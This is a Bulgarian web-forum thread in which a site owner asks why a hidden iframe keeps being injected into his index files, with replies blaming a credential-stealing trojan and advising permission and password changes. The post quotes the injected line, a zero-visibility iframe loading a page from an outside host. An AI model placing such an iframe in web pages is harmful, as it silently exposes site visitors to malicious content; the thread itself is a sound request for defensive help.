Имам следния проблем с iframe

rUMENcho

Registered
Здравейте. Ето какъв проблем имам. По някакъв начин в кода на сайта ми се слагат един много неприеятен ред

Код:
<iframe src="http://3cq.ru:8080/index.php" width=147 height=140 style="visibility: hidden"></iframe>

Това става във всичките index-ови файлове на сайта. През 2, 3 дена си проверявам компютъра за вируси, NOD32 казва, че е чист. Преди 2 дена смених и FTP клиента си, но продължат да се появява тези iframe-ове :( и ми мажат сайта.

Някой има ли някаква идея как да ги оправя и повече да не се появяват, че взе да ми писва.

Благодаря

п.с. Не знам дали тази тема е за този раздел, но понеже е свързано с програмиране и затова реших да я пиша тук.

Здравей,и аз имах тези проблеми,но като си направих правата на 644,и сега нямам проблем.

Смени правата на файловете (CHMOD) на 644 aко това не спре тея шитни виж на хоста ти дали няма някакви нови файлчета и т.н. :)

Здравей
Аз съм web дизайнер в една фирма и доскоро имах същия проблем не с един сайт а да речем с няколко. Iframe който казваш се качва само към файлове носещи име като index, main и т.н.
1. Което трявба да знаеш е че 99,9% в компютъра в който се съхраняват данните за достъп до хоста (ip, user и password) има торянец. За съжаления NOD 32 не го лови така че препоръчвам като за начало да смениш антивирусната (пробвай с Kasperski или Avast ).
2. След като изчистиш компютъра смени паролата за хоста.
3. Никога повече не ползвай NOD
Успех.

Благодаря за съветите! Ще ги изпробвам. Забелязах, че във хостинга ми се появи нов файл - cpbackup-exclude.conf . Празен е, но честно казано не знам за какво иде реч.

Back
Горе